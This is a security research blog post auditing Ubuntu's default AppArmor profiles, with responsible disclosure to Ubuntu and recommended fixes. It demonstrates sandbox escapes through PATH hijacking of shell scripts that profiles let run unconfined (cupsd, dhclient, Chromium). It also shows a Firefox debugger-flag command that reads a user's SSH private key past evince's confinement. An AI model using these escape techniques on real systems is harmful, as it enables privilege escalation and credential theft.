Azimuth Security: Poking Holes in AppArmor Profiles <body onload='MM_preloadImages(&apos;http://www.azimuthsecurity.com/images/a_02.gif&apos;,&apos;http://www.azimuthsecurity.com/images/r_02.gif&apos;,&apos;http://www.azimuthsecurity.com/images/t_02.gif&apos;,&apos;http://www.azimuthsecurity.com/images/s_02.gif&apos;)'><script type="text/javascript"> function setAttributeOnload(object, attribute, val) { if(window.addEventListener) { window.addEventListener('load', function(){ object[attribute] = val; }, false); } else { window.attachEvent('onload', function(){ object[attribute] = val; }); } } </script> <div id="navbar-iframe-container"></div> <script type="text/javascript" src="https://apis.google.com/js/platform.js"></script> <script type="text/javascript"> gapi.load("gapi.iframes:gapi.iframes.style.bubble", function() { if (gapi.iframes && gapi.iframes.getContext) { gapi.iframes.getContext().openChild({ url: 'https://www.blogger.com/navbar.g?targetBlogID\x3d509652393303233687\x26blogName\x3dAzimuth+Security\x26publishMode\x3dPUBLISH_MODE_HOSTED\x26navbarType\x3dBLUE\x26layoutType\x3dCLASSIC\x26searchRoot\x3dhttp://blog.azimuthsecurity.com/search\x26blogLocale\x3den\x26v\x3d2\x26homepageUrl\x3dhttp://blog.azimuthsecurity.com/\x26vt\x3d1038547295672672920', where: document.getElementById("navbar-iframe-container"), id: "navbar-iframe" }); } }); </script>
azimuth security services training resources about BLOG
project zeus
"You will not be informed of the meaning of Project Zeus until the time is right for you to know the meaning of Project Zeus."
Archives
Current Posts
April 2010
May 2010
August 2010
September 2012
February 2013
March 2013
April 2013
May 2013
June 2013
December 2013
March 2014
January 2015
Posts
Poking Holes in AppArmor Profiles
Poking Holes in AppArmor Profiles
posted by Dan Rosenberg @ 9/04/2012 08:57:00 AM  

Hi, Dan here.  In an act of blog necromancy, and keeping with the "sandboxing" theme of previous posts, in this blog post I'll be discussing some issues I recently discovered in a variety of AppArmor profiles.

Introduction to AppArmor

AppArmor is a path-based Mandatory Access Control (MAC) system implemented as a Linux Security Module (LSM) that allows administrators to define per-application profiles that restrict access to system resources. It's designed to be a "build-your-own-sandbox" solution with a policy language that is both flexible and easy to audit. AppArmor is part of the mainline Linux kernel, and both SUSE and Ubuntu (and their variants) enable profiles for several perceived high-risk binaries, including both services and client applications.

In practice, AppArmor suffers from the same weaknesses that plague other similar MAC systems. First, AppArmor does very little to reduce the attack surface of the kernel itself. As a result, it only takes one kernel vulnerability to break out of an AppArmor sandbox entirely. For other solutions that do better in this area, I'd recommend checking out grsecurity or Will Drewry's SECCOMP filter sandboxing, both of which significantly reduce kernel attack surface.

The second consideration that affects AppArmor is that an application's sandbox is only as strong as the policy defining it. Any errors or oversights in a policy definition could lead to incomplete coverage, or worse, render the sandbox completely ineffective.

Keeping this in mind, I audited several of the profiles installed by default on Ubuntu. I was surprised to find that many of these profiles contained fairly basic errors, rendering them essentially useless in the event of a compromise. For our threat model, we'll assume an attacker has achieved arbitrary code execution in the context of an application sandboxed with an AppArmor profile, and we'll see if it's possible to escape the confines of that profile.

Interested readers can view documentation here on AppArmor's profile language. For the purposes of this blog post, it's sufficient to understand how AppArmor handles allowing execution of external binaries. There are four rule types that may be set for execution: inherited execution ("ix"), profile execution ("px"/"Px"), unconfined execution ("ux"/"Ux"), and child execution ("cx"). Rules are written in the following syntax:

/path/to/file accesstype,

Binaries for which inherited execution is permitted may be executed by the sandboxed process and run within the confines of the current profile. As a result, ix rules are uninteresting for the purposes of auditing profiles, since they only allow us to execute additional code in the same sandbox, and we're assuming we already have the ability to execute arbitrary code within the context of our compromised application. However, the remaining execution permission types are more interesting.

Unconfined Execution Rules

The most obvious places to look for flaws are situations where applications are granted the ability to execute unconfined by AppArmor ("Ux" rules). If we can somehow hijack control of an unconfined child process, that would allow us to break out of an application's sandbox entirely.

AppArmor takes a few steps to prevent this sort of hijacking. When a confined process executes an external application, security hooks in the kernel are invoked to evaluate whether the execution should be permitted based on the current profile. In the case of an allowed application with a Ux rule, the kernel sets the AT_SECURE auxilary vector in the loaded ELF image. This results in the linker (ld.so) sanitizing many dangerous environment variables, including LD_PRELOAD and LD_LIBRARY_PATH. This is necessary, or it would be possible to use these environment variables to force any unconfined child process to load a malicious library and run the attacker's code unconfined.

However, one crucial environment variable isn't included in the linker's list of unsafe environment variables: PATH. As a result, any shell script that doesn't explicitly set the PATH or provide full paths for all shell commands is inherantly unsafe to be allowed under a Ux rule.

An attacker running code within the confines of an AppArmor profile may write their payload to disk in some writable location with the name of a pre-chosen shell script command, set the PATH to that directory, and invoke a shell script that's been allowed unconfined execution, at which point the payload will be executed unconfined. Looking at the profiles shipped by default on Ubuntu, three profiles fall victim to this mistake.

First, the profile for cupsd contains the following rule in /etc/apparmor.d/usr.sbin.cupsd:

/usr/lib/cups/filter/** Uxr,

Among the executables in this directory are several shell scripts:

$ for f in `ls /usr/lib/cups/filter/*`; do file $f | grep shell; done
/usr/lib/cups/filter/gstopxl: POSIX shell script, ASCII text executable, with very long lines
/usr/lib/cups/filter/imagetops: POSIX shell script, ASCII text executable
/usr/lib/cups/filter/pstopdf: POSIX shell script, ASCII text executable
/usr/lib/cups/filter/textonly: Bourne-Again shell script, ASCII text executable
/usr/lib/cups/filter/texttops: POSIX shell script, ASCII text executable

Taking a quick look at the first of these shell scripts, we can identify that gstopxl invokes "grep" without a full path:

# Determine the PCL XL/PCL 6 driver to use...
if test "x$PPD" != x; then
  colordevice=`grep '^*ColorDevice:' "$PPD" | awk -F: '{print $2}'`

As a result, when running code within the CUPS AppArmor profile, it is possible to execute arbitrary code unconfined by the profile by placing a payload at /tmp/grep, setting PATH to /tmp, setting the PPD environment variable to some arbitrary value, and executing the gstopxl script. Game over.

Nearly identical issues also affect the profiles for dhclient and Chromium. For dhclient, the following Ux rule for a shell script exists in /etc/apparmor.d/sbin.dhclient:

/etc/dhcp/dhclient-script Uxr,

Sure enough, it is trivial to use PATH to hijack execution of this script as well (try hijacking "ip", for example). Finally, the following rule exists in Chromium's profile at /etc/apparmor.d/usr.bin.chromium-browser:

/usr/bin/xdg-settings Ux,

The same PATH tricks can be used here as well, for example with "cat".

Ubuntu's Sanitized Helper

So far we've managed to achieve completely unconfined code execution from within the AppArmor profiles for Chromium, dhclient, and CUPS. In other profiles, there are no Ux rules, but we can settle for the next best thing.

Ubuntu implements a profile known as "sanitized_helper" that's widely used in place of Ux rules. This profile was implemented when it became clear that allowing any GTK application to run unconfined was unsafe, because an attacker could provide a number of environment variables or arguments, incuding GTK_MODULES, that would cause the unconfined child to load attacker-supplied code. The sanitized helper is designed to be nearly equivalent to running completely unconfined: applications using this profile may execute code in /bin, /usr/bin, /sbin, and /usr/sbin, initiate arbitrary network connections, and read/write to anywhere allowed by standard DAC file permissions on the system.

From the perspective of an attacker, transitioning from a more restrictive profile to the sanitized helper would be a nearly total victory. The restriction of code execution to these system directories provides minimal inconvenience in our threat model, where an attacker is already executing arbitrary code in the context of a compromised application (except perhaps to limit access to the rare setuid binary that lives outside of these directories). I would argue that being able to read and write every file accessible to the compromised user and make network connections freely is functionally equivalent to not being confined at all.

Transitions to the sanitized helper are implemented using the Cx (child execution) rule. Not surprisingly, several profiles allow transitions to the sanitized helper profile for shell scripts, resulting in the same problems as we saw with Ux shell scripts. For example, the evince profile (at /etc/apparmor.d/usr.bin.evince) includes the following abstraction:

#include <abstractions/ubuntu-browsers>

This results in the inclusion of the following policy rules:

/usr/bin/chromium-browser Cx -> sanitized_helper,
/usr/lib/chromium-browser/chromium-browser Cx -> sanitized_helper,

# this should cover all firefox browsers and versions (including shiretoko
# and abrowser)
/usr/bin/firefox Cxr -> sanitized_helper,
/usr/lib/firefox*/firefox*.sh Cx -> sanitized_helper,

All of these are shell scripts. By manipulating the execution of these scripts, we can go from being confined within the evince profile to the essentially unrestricted sanitized helper profile. Conveniently, manipulation of PATH isn't necessary in this case, since both browsers may be invoked with arguments specifying the path of a supposed debugger to be invoked on startup. This can be demonstrated from a shell executing within the evince profile, which restricts read access to certain sensitive files in the user's home directory:

sh-4.2$ read key < .ssh/id_rsa
sh: .ssh/id_rsa: Permission denied
sh-4.2$ /usr/bin/firefox -g -d /bin/cat -a '.ssh/id_rsa -'
-----BEGIN RSA PRIVATE KEY-----
This is my private key, please don't own me!


Additionally, the Firefox profile (in /etc/apparmor.d/usr.bin.firefox) makes the same mistake by including /etc/apparmor.d/abstractions/ubuntu-browsers.d/ubuntu-integration, which allows the "apport-bug" shell script to transition to the sanitized environment.

One thing to note is that the sanitized helper allows execution of child processes using Pix rules, indicating that execution will transition to another previously defined profile if it exists, falling back to inherited execution otherwise.  From /etc/apparmor.d/abstractions/ubuntu-helpers:


# Allow exec of anything, but under this profile. Allow transition
# to other profiles if they exist.
/bin/* Pixr,
/sbin/* Pixr,
/usr/bin/* Pixr,
/usr/sbin/* Pixr,


As a result, it may be possible to perform an attack where a compromised application transitions to execution within the sanitized helper and subsequently escalates privileges to unconfined execution by hijacking another application with a vulnerable Ux transition.

However, at the time of this writing, a bug in AppArmor actually prevents properly transitioning from the sanitized helper to other existing profiles via the Pix rules, instead always using inherited execution.  Ironically, once this bug is fixed, chaining multiple weaknesses to achieve unconfined code execution will be a possibility.

Final Thoughts

Issues arising from allowing shell scripts to execute unconfined or in a less restrictive profile are just the tip of iceberg with AppArmor. The deeper problem is that none of these external applications were designed to be resilient against a user with the ability to execute them with nearly arbitrary arguments, input, and environment. Outside of sandboxes like AppArmor, there is nothing to be gained by finding a way to execute code in the context of an application that would only run at the same privilege level as the user performing the exploitation. However, as soon as these applications are allowed to run with higher privileges in an AppArmor profile, they become candidates for privilege escalation and escaping the confines of an AppArmor sandbox.

There are a few obvious areas that could use immediate improvement if AppArmor is to provide any sort of real protection. Firstly, all transitions to higher privileged contexts, either via Ux rules or the use of Ubuntu's sanitized helper, should be minimized for existing profiles. Until AppArmor allows filtering environment variables like PATH with better granularity, execution of shell scripts at higher privileges should be assumed to be generally unsafe. Finally, each remaining privileged execution rule should be audited to minimize vectors for executing arbitrary code. While some profiles, such as those for BIND and mysql, have minimal exemptions and tightly defined rule sets, much work needs to be done to achieve robust confinement of applications with more external dependencies, such as browsers, document viewers, and other client-side applications.

Labels: , ,

3 comments:

At September 7, 2012 at 9:27 AM , Anonymous Anonymous said...

Thanks Dan for the review and also for contacting Ubuntu directly. Work to address these issues is being tracked in https://launchpad.net/bugs/1045986 - jdstrand

At December 14, 2012 at 3:34 AM , Anonymous surveillance cameras said...

This is impressive and with this you can get the bets view

At January 31, 2014 at 10:31 PM , Anonymous Anonymous said...

sooooo, it would be wise to remove the "P" and just ix for most parts to avoid sandbox escalation?

Post a Comment

Subscribe to Post Comments [Atom]

<< Home

© Copyright 2013 Azimuth Security Pty Ltd